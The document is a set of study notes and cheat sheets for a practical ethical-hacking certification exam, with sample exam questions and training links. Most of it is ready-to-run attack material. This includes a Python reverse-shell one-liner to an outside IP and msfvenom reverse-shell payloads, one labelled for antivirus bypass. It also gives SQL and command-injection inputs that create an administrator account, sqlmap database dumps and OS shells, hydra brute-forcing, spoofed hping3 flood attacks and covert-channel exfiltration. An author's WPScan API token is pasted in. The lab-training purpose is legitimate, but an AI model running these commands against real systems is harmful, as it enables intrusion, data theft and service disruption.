WPSCAN (--url URL --enumerate u)
METASPLOIT (auxiliary/scanner/http/wordpress_login_enum)
COMMAND INJECTION ( |hostname, |net user TEST /add)
VEGA
ACUNETIX web scanner
----------------------------------------------------------------------------
FILE UPLOAD VULNERABILITY
msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=PORT -f raw
GUARDAR COMO PHP FILE
USAR BURP SUITE PARA MODIFICAR ON THE FLY LA EXTENSION DEL ARCHIVO
-----------------------------------------------------------------------------
CSRF
ABRIR WP /PLUGINS/INSTALLED PLUGINS/FIREWALL2
WPSCAN ENUMERATE VP
-----------------------------------------------------------------------------
SQL INJECTION
' OR 1=1 -- (;'INSERT INTO LOGIN VALUES ('JOHN','APPLE');--)
';exec master..xp_cmdshell'ping URL -| 65000 -t';--
--------------------------------------------------------------
N-STALKER X
owasp policy
---------------------------------------------------------------
CONSOLE (document.cookie)
SQLMAP (-u url --cookie= --dbs)
HACKING WIRELESS
AIRCRACK-NG
CRYPTOGRAPHY
HASHCALC
CRYPTOFORGE
BCTEXTENCODER
VERACRYPT
CLOUD COMPUTING
BYPASS AV MSFVENOM linux/x86/shell/reverse_tcp -F ELF
SLOWLORIS DoS
MOBILE HACKING
MSFVENOM -L (android/meterpreter/reverse_tcp)
Exam Cheats sheets (3):
My Initial way of approaching Exam/ Vuln CTF Boxes:
netdiscover -i eth0 — This will help me to get the machines available on our network. [ eth0 may differ if VPN network I will be tun0 ]
Once I get the IP’s I will run my Nmap on all those IP’s.
nmap -p- 10.10.10.10 [ Any IP ]
Once I ran the above command I will get all the opened port on that target and then with that open port, I will run another nmap,
for example, if port 443,80,53,135,8080,8888 are opened then my nmap command will be.
4. nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 10.10.10.10
This will find out the OS version, service version, and ran default nmap script and store the output. Storing output is very important, you may need to refer it many times.
5. While nmap is running I will open all the IPs on browser and will see whether any web service is running on not, if Yes then I will run gobuster or dirb.
gobuster -e -u http://10.10.10.10 -w wordlsit.txt
dirb http://10.10.10.10 wordlist.txt
6. If I find any login page I will try SQLi manually
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1—
7. Brute Forcing services !! and making custom wordlists is always an added advantage but make sure the service won’t be down OR lock you out from trying again.
Some of the default password list:
http://www.phenoelit.org/dpl/dpl.html
https://datarecovery.com/rd/default-passwords/
https://github.com/Dormidera/WordList-Compendium
Making custom wordlist from website keywords:
cewl example.com -m 5 -w words.txt
where cewl is the tool, example.com is the site, -m is to specify the minimum length of the word , -w is to specify the output file
Some of the service brute force with hydra:
hydra -l root -P passwords.txt [-t 32] <IP> ftp
hydra -L usernames.txt -P pass.txt <IP> mysql
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
hydra -P common-snmp-community-strings.txt target.com snmp
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
hydra -l root -P passwords.txt <IP> ssh
Searchsploit useful commands:
searchsploit “Linux Kernel”
searchsploit -m 7618 — Paste the exploit in the current directory
searchsploit -p 7618[.c] — Show complete path
searchsploit — nmap file.xml — Search vulns inside a Nmap XML result
Exam Cheats sheets (3):
## NMAP
- Scan a single IP `nmap 192.168.1.1`
- Scan a host `nmap www.testhostname.com`
- Scan a range of IPs `nmap 192.168.1.1-20`
- Scan a subnet `nmap 192.168.1.0/24`
- Scan targets from a text file `nmap -iL list-of-ips.txt`
- Scan a single Port `nmap -p 22 192.168.1.1`
- Scan a range of ports `nmap -p 1-100 192.168.1.1`
- Scan 100 most common ports (Fast) `nmap -F 192.168.1.1`
- Scan all 65535 ports `nmap -p- 192.168.1.1`
- Scan using TCP connect `nmap -sT 192.168.1.1`
- Scan using TCP SYN scan (default) `nmap -sS 192.168.1.1`
- Scan UDP ports `nmap -sU -p 123,161,162 192.168.1.1`
- Scan selected ports - ignore discovery `nmap -Pn -F 192.168.1.1`
- Detect OS and Services `nmap -A 192.168.1.1`
- Standard service detection `nmap -sV 192.168.1.1`
- More aggressive Service Detection `nmap -sV --version-intensity 5 192.168.1.1`
- Lighter banner grabbing detection `nmap -sV --version-intensity 0 192.168.1.1`
- Save default output to file `nmap -oN outputfile.txt 192.168.1.1`
- Save results as XML `nmap -oX outputfile.xml 192.168.1.1`
- Save results in a format for grep `nmap -oG outputfile.txt 192.168.1.1`
- Save in all formats `nmap -oA outputfile 192.168.1.1`
- Scan using default safe scripts `nmap -sV -sC 192.168.1.1`
- Get help for a script `nmap --script-help=ssl-heartbleed`
- Scan using a specific NSE script `nmap -sV -p 443 –script=ssl-heartbleed.nse 192.168.1.1`
- Scan with a set of scripts `nmap -sV --script=smb* 192.168.1.1`
- Gather page titles from HTTP services `nmap --script=http-title 192.168.1.0/24`
- Get HTTP headers of web services `nmap --script=http-headers 192.168.1.0/24`
- Find web apps from known paths `nmap --script=http-enum 192.168.1.0/24`
## SQLMAP
- Simple usage `sqlmap -u “https://target_site.com/page/”`
- Automatic GET request parameter `sqlmap -u “https://target_site.com/page?p1=value1&p2=value2”`
- Use POST request `sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2"`
- Request file as input(get it from Burpsuite) `sqlmap -r request.txt`
- Use authenticated session with cookie `sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --cookie="Session_Cookie_Value"`
- Use authenticated session with auth headers `sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"`
- Basic authentication `sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password`
# Post exploitation(use these if the SQLi vuln is positive)
- List databases `sqlmap -u “https://target_site.com/page?p1=value1” --dbs`
- List tables of TARGET_DB `sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --tables`
- List columns of TARGET_TABLE in TARGET_DB `sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --columns`
- Dump specific data of columns `sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump`
- Fully dump table `sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --dump`
- Dump the entire database `sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --dump`
- Custom SQL query `sqlmap -u “https://target_site.com/page?p1=value1” --sql-query "SELECT * FROM TARGET_DB;"`
- Get OS shell `sqlmap -u “https://target_site.com/page?p1=value1” --os-shell`
- Get SQL shell `sqlmap -u “https://target_site.com/page?p1=value1” --sqlmap-shell`
- Use attack techniques `sqlmap -u “https://target_site.com/page?p1=value1” --technique=BEUSTQ`
- B: Boolean-based blind
- E: Error-based
- U: Union query-based
- S: Stacked queries
- T: Time-based blind
- Q: Inline queries
### General purpose command
`sqlmap -u “https://target_site.com/page/”--proxy="http://127.0.0.1:8080/" --cookie=”SESSID=lred0jr6na1vmci;” --data=”p1=value1” -p p1 --level=5 --risk=3 --dbms=mysql --technique=BEUSTQ --force-ssl`
## Telnet enumeration
`telnet 192.168.0.1`
## FTP enumeration
`ftp 192.168.0.1`
## SMB Enumeration
`smbmap -H 192.168.0.1 -R`
`smbclient -L 192.168.0.1`
`smbclient \\\\192.168.0.1\\share`
## RPC Enumeration
`rpcclient -U "" -N 192.168.0.1`
`enumdomusers`
`queryuser <username>`
## RDP Enumeration
`xfreerdp /v:10.129.189.90 /cert:ignore /u:Administrator`
## Shells
"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.23\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
### after obtaining shell
python -c 'ímport pty;pty.spawn("/bin/sh")'
Exam Cheats sheets (4):
**Module 03: Scanning Networks**
**Lab1-Task1: Host discovery**
- **nmap -sn -PR [IP]**
- **-sn:** Disable port scan
- **-PR:** ARP ping scan
- **nmap -sn -PU [IP]**
- **-PU:** UDP ping scan
- **nmap -sn -PE [IP or IP Range]**
- **-PE:** ICMP ECHO ping scan
- **nmap -sn -PP [IP]**
- **-PP:** ICMP timestamp ping scan
- **nmap -sn -PM [IP]**
- **-PM:** ICMP address mask ping scan
- **nmap -sn -PS [IP]**
- **-PS:** TCP SYN Ping scan
- **nmap -sn -PA [IP]**
- **-PA:** TCP ACK Ping scan
- **nmap -sn -PO [IP]**
- **-PO:** IP Protocol Ping scan
**Lab2-Task3: Port and Service Discovery**
- **nmap -sT -v [IP]**
- **-sT:** TCP connect/full open scan
- **-v:** Verbose output
- **nmap -sS -v [IP]**
- **-sS:** Stealth scan/TCP hall-open scan
- **nmap -sX -v [IP]**
- **-sX:** Xmax scan
- **nmap -sM -v [IP]**
- **-sM:** TCP Maimon scan
- **nmap -sA -v [IP]**
- **-sA:** ACK flag probe scan
- **nmap -sU -v [IP]**
- **-sU:** UDP scan
- **nmap -sI -v [IP]**
- **-sI:** IDLE/IPID Header scan
- **nmap -sY -v [IP]**
- **-sY:** SCTP INIT Scan
- **nmap -sZ -v [IP]**
- **-sZ:** SCTP COOKIE ECHO Scan
- **nmap -sV -v [IP]**
- **-sV:** Detect service versions
- **nmap -A -v [IP]**
- **-A:** Aggressive scan
**Lab3-Task2: OS Discovery**
- **nmap -A -v [IP]**
- **-A:** Aggressive scan
- **nmap -O -v [IP]**
- **-O:** OS discovery
- **nmap –script smb-os-discovery.nse [IP]**
- **-–script:** Specify the customized script
- **smb-os-discovery.nse:** Determine the OS, computer name, domain, workgroup, and current time over the SMB protocol (Port 445 or 139)
**Module 04: Enumeration**
**Lab2-Task1: Enumerate SNMP using snmp-check**
- nmap -sU -p 161 [IP]
- **snmp-check [IP]**
**Addition**
- nbtstat -a [IP] (Windows)
- nbtstat -c
**Module 06: System Hacking**
**Lab1-Task1: Perform Active Online Attack to Crack the System's Password using Responder**
- **Linux:**
- cd
- cd Responder
- chmox +x ./Responder.py
- **sudo ./Responder.py -I eth0**
- passwd: \*\*\*\*
- **Windows**
- run
- \\CEH-Tools
- **Linux:**
- Home/Responder/logs/SMB-NTMLv2-SSP-[IP].txt
- sudo snap install john-the-ripper
- passwd: \*\*\*\*
- **sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt**
**Lab3-Task6: Covert Channels using Covert\_TCP**
- **Attacker:**
- cd Desktop
- mkdir Send
- cd Send
- echo "Secret"->message.txt
- Place->Network
- Ctrl+L
- **smb://[IP]**
- Account & Password
- copy and paste covert\_tcp.c
- **cc -o covert\_tcp covert\_tcp.c**
- **Target:**
- **tcpdump -nvvx port 8888 -I lo**
- cd Desktop
- mkdir Receive
- cd Receive
- File->Ctrl+L
- smb://[IP]
- copy and paste covert\_tcp.c
- cc -o covert\_tcp covert\_tcp.c
- **./covert\_tcp -dest 10.10.10.9 -source 10.10.10.13 -source\_port 9999 -dest\_port 8888 -server -file /home/ubuntu/Desktop/Receive/receive.txt**
- **Tcpdump captures no packets**
- **Attacker**
- **./covert\_tcp -dest 10.10.10.9 -source 10.10.10.13 -source\_port 8888 -dest\_port 9999 -file /home/attacker/Desktop/send/message.txt**
- Wireshark (message string being send in individual packet)
**Lab0-Task0: Rainbowcrack and QuickStego**
- Use Winrtgen to generate a rainbow table
- Launch RainbowCrack
- File->Load NTLM Hashes from PWDUMP File
- Rainbow Table->Search Rainbow Table
- Use the generated rainbow table
- RainbowCrack automatically starts to crack the hashes
**Lab 0-Task1: Rainbowcrack and QuickStego**
- Launch QuickStego
- Open Image, and select target .jpg file
- Open Text, and select a txt file
- Hide text, save image file
- Re-launch, Open Image
- Select stego file
- Hidden text shows up
**Module 08: Sniffing**
**Lab2-Task1: Password Sniffing using Wireshark**
- **Attacker**
- Wireshark
- **Target**
- [www.moviescope.com](http://www.moviescope.com/)
- Login
- **Attacker**
- Stop capture
- File-\>Save as
- Filter: **http.request.method==POST**
- RDP log in Target
- service
- start Remote Packet Capture Protocol v.0 (experimental)
- Log off Target
- Wireshark-\>Capture options-\>Manage Interface-\>Remote Interfaces
- Add a remote host and its interface
- Fill info
- **Target**
- Log in
- Browse website and log in
- **Attacker**
- Get packets
**Module 10: Denial-of-Service**
**Lab1-Task2: Perform a DoS Attack on a Target Host using hping3**
- **Target:**
- Wireshark-\>Ethernet
- **Attacker**
- **hping3 -S [Target IP] -a [Spoofable IP] -p 22 -flood**
- **-S: Set the SYN flag**
- **-a: Spoof the IP address**
- **-p: Specify the destination port**
- **--flood: Send a huge number of packets**
- **Target**
- Check wireshark
- **Attacker (Perform PoD)**
- **hping3 -d 65538 -S -p 21 –flood [Target IP]**
- **-d: Specify data size**
- **-S: Set the SYN flag**
- **Attacker (Perform UDP application layer flood attack)**
- nmap -p 139 10.10.10.19 (check service)
- **hping3 -2 -p 139 –flood [IP]**
- **-2: Specify UDP mode**
- **Other UDP-based applications and their ports**
- CharGen UDP Port 19
- SNMPv2 UDP Port 161
- QOTD UDP Port 17
- RPC UDP Port 135
- SSDP UDP Port 1900
- CLDAP UDP Port 389
- TFTP UDP Port 69
- NetBIOS UDP Port 137,138,139
- NTP UDP Port 123
- Quake Network Protocol UDP Port 26000
- VoIP UDP Port 5060
**Module 13: Hacking Web Servers**
**Lab2-Task1: Crack FTP Credentials using a Dictionary Attack**
- nmap -p 21 [IP]
- **hydra -L usernames.txt -P passwords.txt ftp://10.10.10.10**
**Module 14: Hacking Web Applications**
**Lab2-Task1: Perform a Brute-force Attack using Burp Suite**
- Set proxy for browser: 127.0.0.1:8080
- Burpsuite
- Type random credentials
- capture the request, right click-\>send to Intrucder
- Intruder-\>Positions
- Clear $
- Attack type: Cluster bomb
- select account and password value, Add $
- Payloads: Load wordlist file for set 1 and set 2
- start attack
- **filter status==302**
- open the raw, get the credentials
- recover proxy settings
**Lab2-Task3: Exploit Parameter Tampering and XSS Vulnerabilities in Web Applications**
- Log in a website, change the parameter value (id )in the URL
- Conduct a XSS attack: Submit script codes via text area
**Lab2-Task5: Enumerate and Hack a Web Application using WPScan and Metasploit**
- **wpscan --api-token hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads --url** **http://10.10.10.16:8080/CEH** **--plugins-detection aggressive --enumerate u**
- **--enumerate u: Specify the enumeration of users**
- **API Token: Register at** [**https://wpscan.com/register**](https://wpscan.com/register)
- **Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads**
- service postgresql start
- msfconsole
- **use auxiliary/scanner/http/wordpress\_login\_enum**
- show options
- **set PASS\_FILE password.txt**
- **set RHOST 10.10.10.16**
- **set RPORT 8080**
- **set TARGETURI** **http://10.10.10.16:8080/CEH**
- **set USERNAME admin**
- run
- Find the credential
**Lab2-Task6: Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server (DVWA low level security)**
- If found command injection vulnerability in an input textfield
- | hostname
- | whoami
- **| tasklist| Taskkill /PID /F**
- **/PID: Process ID value od the process**
- **/F: Forcefully terminate the process**
- | dir C:\
- **| net user**
- **| net user user001 /Add**
- **| net user user001**
- **| net localgroup Administrators user001 /Add**
- Use created account user001 to log in remotely
**Module 15: SQL Injection**
**Lab1-Task2: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap**
- Login a website
- Inspect element
- Dev tools-\>Console: document.cookie
- **sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" –dbs**
- **-u: Specify the target URL**
- **--cookie: Specify the HTTP cookie header value**
- **--dbs: Enumerate DBMS databases**
- Get a list of databases
- Select a database to extract its tables
- **sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" -D moviescope –tables**
- **-D: Specify the DBMS database to enumerate**
- **--tables: Enumerate DBMS database tables**
- Get a list of tables
- Select a column
- **sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" -D moviescope –T User\_Login --dump**
- Get table data of this column
- **sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" --os-shell**
- Get the OS Shell
- TASKLIST
**Module 20: Cryptography**
**Lab1-Task2: Calculate MD5 Hashes using MD5 Calculator**
- Nothing special
**Lab4-Task1: Perform Disk Encryption using VeraCrypt**
- Click VeraCrypt
- Create Volumn
- Create an encrypted file container
- Specify a path and file name
- Set password
- Select NAT
- Move the mouse randomly for some seconds, and click Format
- Exit
- Select a drive, select file, open, mount
- Input password
- Dismount
- Exit
**Module Appendix: Covered Tools**
- **Nmap**
- Multiple Labs
- **Hydra**
- Module 13: Lab2-Task1
- **Sqlmap**
- Module 15: Lab1-Task2
- **WPScan**
- Module 14: Lab2-Task5
- wpscan –-url http://10.10.10.10 -t 50 -U admin -P rockyou.txt
- **Nikto**
- [https://zhuanlan.zhihu.com/p/124246499](https://zhuanlan.zhihu.com/p/124246499%20)
- **John**
- Module 06: Lab1-Task1
- **Hashcat**
- **Crack MD5 passwords with a wordlist:**
- hashcat hash.txt -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
- **Crack MD5 passwords in a certain format:**
- hashcat -m 0 -a 3 ./hash.txt 'SKY-HQNT-?d?d?d?d'
- [https://xz.aliyun.com/t/4008](https://xz.aliyun.com/t/4008)
- [https://tools.kali.org/password-attacks/hashcat](https://tools.kali.org/password-attacks/hashcat)
- **Metasploit**
- Module 14: Lab2-Task5
- **Responder LLMNR**
- Module 06: Lab1-Task1
- **Wireshark or Tcpdump**
- Multiple Labs
- **Steghide**
- **Hide**
- steghide embed -cf [img file] -ef [file to be hide]
- steghide embed -cf 1.jpg -ef 1.txt
- Enter password or skip
- **Extract**
- steghide info 1.jpg
- steghide extract -sf 1.jpg
- Enter password if it does exist
- **OpenStego**
- [https://www.openstego.com/](https://www.openstego.com/)
- **QuickStego**
- Module 06: Lab0-Task1
- **Dirb (Web content scanner)**
- [https://medium.com/tech-zoom/dirb-a-web-content-scanner-bc9cba624c86](https://medium.com/tech-zoom/dirb-a-web-content-scanner-bc9cba624c86)
- [https://blog.csdn.net/weixin\_44912169/article/details/105655195](https://blog.csdn.net/weixin_44912169/article/details/105655195)
- **Searchsploit (Exploit-DB)**
- [https://www.hackingarticles.in/comprehensive-guide-on-searchsploit/](https://www.hackingarticles.in/comprehensive-guide-on-searchsploit/)
- **Crunch (wordlist generator)**
- [https://www.cnblogs.com/wpjamer/p/9913380.html](https://www.cnblogs.com/wpjamer/p/9913380.html)
- **Cewl (URL spider)**
-[https://www.freebuf.com/articles/network/190128.html](https://www.freebuf.com/articles/network/190128.html)
- **Veracrypt**
- Module 20: Lab4-Task1
- **Hashcalc**
- Module 20: Lab1-Task1 (Nothing special)
- **Rainbow Crack**
- Module 06: Lab0-Task0
- **Windows SMB**
- smbclient -L [IP]
- smbclient \\ip\\sharename
- nmap -p 445 -sV –script smb-enum-services [IP]
- **Run Nmap at the beginning **
- nmap -sn -PR 192.168.1.1/24 -oN ip.txt
- nmap -A -T4 -vv -iL ip.txt -oN nmap.txt
- nmap -sU -sV -A -T4 -v -oN udp.txt
Exam Questions:
How many Machines are active? Use netdiscover
Which Machine has FTP Server open? Use nmap
Find 2 secret files using FTP? brute force FTP usernames
Find out phone number of Web application user? Use sqlmap
Brute Force Wordpress website User's Password? --> Use wpscan
Decode .hex file?--> Use Cryptool
Which Machine started DOS attack? DDOS attack happened on which IP? Find out http Credentials from PCAP file? Use Wireshark to check PCAP file.
Decode the given text using given secret? Use BCTextEncoder
Calculate SHAI hash of a text? Use Hashcalc
Decrypt the hidden Volume and find secret file?--> Use Veracrypt
Crack the given hash?--> Use hashes.com
Find Secret hidden in the Image/File?--> Use OpenStego/Snow
Find a Secret file in Android?--> Use ADB
Send data to another machine(firewall blocked)?--> Use Covert TCP
What is the IP of the Windows X machine?
What is the version of the Linux Kernel?
How many Windows machines are there?
What is the password for user X of the FTP server?
What is user X's IBAN number?
Which user X's phone number?
What is the password hidden in the .jpeg file?
Find the IP address of the machine which is running the RDP?
Find the OS name of the machine which is running MySQL database?
Find the HTTP method that poses a high risk to the application example.com?
Find the Phone number the employee?
Find the file name which is tampered by comparing the hashes which is given in the /hashes folder?
Decrypt the volume file using veracrypt?
Connect to the Server remotely using the credentials give by RDP?
Decode the file which is encoded in DES(ECB) format?
Find the password of the wordpress user “Raj”?
Find the attacker IP address who has launched the DOS attack?
Find the number of machines that were used to iniate the DDOS attack?
Find the username/password from the pcap file, which is in plain text?
Extract the information from the SDcard of the Android User?
Sql injection using sqlmap: u need to perform sql injection attack using sqlmap and need to extract password of specific user.
You need to check which hosts have rdp enabled. For this u need to perform the port scan on 3389 and then os discovery on open port host and u need to get os of that rdp enabled host.
U need to check the mysql service running on which host. Same question 2 technique you need to perform.
U need to extract username and password of ftp ( hydra tool u need to use and need to use wordlist placed in desktop wordlist folder)
U need to get the password.txt file using veracrypt (disk encryption)
U need to get the username and password using wireshark.
U need to check bit 3 is true or not using wireshark
U need to check the traffic from which port to which port is moving using wireshark
U need to decrypt the 3des encryption using cryptool.
U need to extract the pin using opensteg
U need to perform steganalysis on the txt file using snow tool
U need to perform brute force on the website using burpsuite ( using intruder)
U need to crack hash file using john ( the hash file is located in the responder tool logs file)
U need to find the flag file from the ftp. ( for this task bro please use the credentials u cracked in previous challenge)
Perform remote os command injection (dvwa web) and need to get the content from pin file
Perform file upload (dvwa web)
U need to compare the hashes using md5 and provide results which file is tampered.
Need to crack hash file ( john the ripper)
U need to find trojan and need to provide the port of the trojan
U need to perform the parameter tampering
What is the IP of the Windows X machine?
What is the version of the Linux Kernel?
How many Windows machines are there?
What is the password for user X of the FTP server?
What is user X's IBAN number?
Which user X's phone number?
What is the password hidden in the .jpeg file?
Demonstrate the understanding of attack vectors.
Find service and detect the OS?
What is the password for user X of the FTP server?
Which user X's phone number?
What is the password hidden in the .jpeg file?
What is the hidden message in the .txt file?
Find X from .pcap file
Crack X user hash
Perform network scanning to identify live and vulnerable machines in a network.
Perform OS banner grabbing, service, and user enumeration.
Perform system hacking, steganography, steganalysis attacks, and cover tracks.
Identify and use viruses, computer worms, and malware to exploit systems.
Perform packet sniffing.
Conduct a variety of web server and web application attacks including directory traversal, parameter tampering, XSS, etc.
Perform SQL injection attacks.
Perform different types of cryptography attacks.
Perform vulnerability analysis to identify security loopholes in the target organization’s network, communication infrastructure, and end systems etc.
Vulnerability analysis to identify security loopholes in the target organization’s network, communication infrastructure, and end systems, etc;
System hacking, steganography;
Network scanning to identify live and vulnerable machines in a network;
OS banner grabbing, service, and user enumeration;
Different types of cryptography attacks;
SQL injection attacks;
Packet sniffing;
Good Resources:
https://github.com/nirangadh/ceh-practical
https://github.com/Rezkmike/CEH_Practical_Preparation
https://github.com/nirangadh/ceh-practical
Gem Resources: https://book.thegurusec.com/certifications/certified-ethical-hacker-practical
https://medium.com/techiepedia/certified-ethical-hacker-practical-exam-guide-dce1f4f216c9
https://github.com/cmuppin/CEH
https://github.com/Samson-DVS/CEH-Practical-Notes
TryHackMe Rooms
SQL Injection labs:-
https://tryhackme.com/room/dailybugle
https://tryhackme.com/room/revenge
File Uploading Vulnerability to RCE Video:-
https://www.youtube.com/watch?v=OZ9Bo6Ipojw
Command Injection labs:-
https://portswigger.net/web-security/os-command-injection
IDOR labs:-
https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references
Must Practice:-
https://tryhackme.com/room/owaspjuiceshop
CEH-Practical-Guide:-
https://github.com/CyberSecurityUP/Guide-CEH-Practical-Master
ILabs videos:-
https://www.youtube.com/watch?v=b2YrqpeklFw&list=PLrrgFyE6PtlaCixUxJPM0Y9Peye6iCewH&index=18
Repo For Notes:-
https://blog.adithyanak.com/ceh-practical-notes
https://github.com/ziyishen97/CEH-v11-Practical/blob/main/Practical%20Exam%20Notes.md
Wireshark labs:-
https://tryhackme.com/room/overpass2hacked
https://tryhackme.com/room/smaggrotto
https://tryhackme.com/room/h4cked
https://tryhackme.com/room/tshark
https://shishirsubedi.com.np/thm/misguided_ghosts/
Hydra labs:-
https://tryhackme.com/room/hydra
Cracking labs:-
https://tryhackme.com/room/crackthehash
https://tryhackme.com/room/crackthehashlevel2
Cryptography:-
https://www.hackthebox.eu/home/challenges/Crypto
Steganography:-
https://www.hackthebox.eu/home/challenges/Stego
Brutforce:-
https://www.youtube.com/watch?v=fdb3U2EFLzo
https://tryhackme.com/room/linuxfundamentalspart1
https://tryhackme.com/room/crackthehash
https://tryhackme.com/room/basicpentestingjt
https://tryhackme.com/room/sqlmap
https://tryhackme.com/room/dvwa
https://tryhackme.com/room/ice
https://tryhackme.com/room/windowsfundamentals1xbx
https://tryhackme.com/room/cryptographyfordummies
https://tryhackme.com/room/lianyu
https://tryhackme.com/module/linux-fundamentals
https://tryhackme.com/module/introduction-to-offensive-pentesting
https://tryhackme.com/module/windows-fundamentals
https://tryhackme.com/room/furthernmap
https://tryhackme.com/room/nmap03
https://tryhackme.com/room/nmap04
https://tryhackme.com/room/johntheripper0
https://tryhackme.com/room/hydra
https://tryhackme.com/room/crackthehash
https://tryhackme.com/room/crackthehashlevel2
https://tryhackme.com/room/ccstego
https://tryhackme.com/room/introtonetworking
https://tryhackme.com/room/protocolsandservers
https://tryhackme.com/room/protocolsandservers2
https://tryhackme.com/room/wireshark
https://tryhackme.com/room/owasptop10
https://tryhackme.com/room/learnowaspzap
https://tryhackme.com/room/introtoshells
https://tryhackme.com/room/pentestingfundamentals
https://tryhackme.com/room/rpmetasploit
https://tryhackme.com/room/easypeasyctf
https://tryhackme.com/room/dailybugle
Tools:-
https://lnkd.in/gvExZAk
https://lnkd.in/gFd7C-c
https://lnkd.in/guZsBtX
https://lnkd.in/gQDithi
https://lnkd.in/gSaZTcF
https://lnkd.in/gRFivzZ
https://lnkd.in/gnBZ8N2
https://lnkd.in/gXH5qDX
https://lnkd.in/g7x59qP
Challenge rooms:-
https://lnkd.in/gFYnaTz
https://tryhackme.com/room/crackthehash, https://tryhackme.com/room/crackthehashlevel2
Last updated